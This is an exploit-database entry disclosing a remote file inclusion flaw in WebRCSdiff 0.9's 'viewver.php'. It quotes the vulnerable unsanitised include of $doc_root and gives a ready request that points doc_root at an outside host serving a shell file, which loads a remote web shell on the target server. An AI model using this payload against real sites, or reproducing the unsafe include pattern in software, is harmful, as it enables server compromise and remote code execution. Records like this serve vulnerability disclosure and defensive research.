WebRCSdiff 0.9 - 'viewver.php' Remote File Inclusion
Author: FL0RiX
type: webapps
platform: php
port:
date_added: 2010-11-18
date_updated: 2010-11-18
verified: 0
codes:
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comwebrcsdiff-0.9.tar.zip
========================================================
= Author: Fl0riX - Bug Researchers
= Application Name : WebRCSdiff 0.9
= Vulnerable Type: Remote File Inclusion
= Download: http://sourceforge.net/projects/webrcsdiff/files/webrcsdiff/0.9%20Release/webrcsdiff-0.9.tar.zip/download
= Risk : High
= Infection: Uzaktan Dosya Dahil edilebilir.
========================================================
=
Error c0d3;
include ("$doc_root/dir_config.php");
========================================================
=
Example;
site/viewver?doc_root=http://fl0rix/shell.txt?
========================================================